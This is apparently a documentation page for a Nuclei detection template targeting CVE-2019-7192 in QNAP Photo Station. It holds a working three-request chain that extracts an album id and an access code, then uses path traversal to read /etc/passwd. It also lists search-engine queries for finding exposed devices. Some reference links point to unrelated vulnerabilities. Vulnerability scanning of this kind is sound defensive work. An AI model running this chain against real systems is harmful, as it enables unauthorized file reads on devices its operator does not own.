QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
ID: CVE-2019-7192
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss
Description
Section titled “Description”This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
YAML Source
Section titled “YAML Source”id: CVE-2019-7192
info: name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution author: DhiyaneshDK severity: critical description: | This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-7192 - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-7192 cwe-id: CWE-863 epss-score: 0.96341 epss-percentile: 0.99549 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: qnap product: photo_station shodan-query: - 'Content-Length: 580 "http server 1.0"' - http.title:"photo station" - http.title:"qnap" - 'content-length: 580 "http server 1.0"' fofa-query: - title="photo station" - title="qnap" google-query: - intitle:"qnap" - intitle:"photo station" tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss
http: - raw: - | POST /photo/p/api/album.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
a=setSlideshow&f=qsamplealbum - | GET /photo/slideshow.php?album={{album_id}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - | POST /photo/p/api/video.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
matchers-condition: and matchers: - type: regex part: body_3 regex: - "admin:.*:0:0:"
- type: word part: header_3 words: - video/subtitle
- type: status part: header_3 status: - 200
extractors: - type: regex name: album_id part: body_1 group: 1 regex: - '<output>([a-zA-Z]+)<\/output>' internal: true
- type: regex name: access_code part: body_2 group: 1 regex: - encodeURIComponent\('([A-Za-z0-9]+)'\) internal: true# digest: 490a0046304402201a5f0621233474f54342d3d0e77052952803f086eef77370ec5ba8b1970ea71a02203d129c59c97dcda477a66269979decc380491448e5e91b6a8bcaf4bed76c6f8c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-7192.yaml"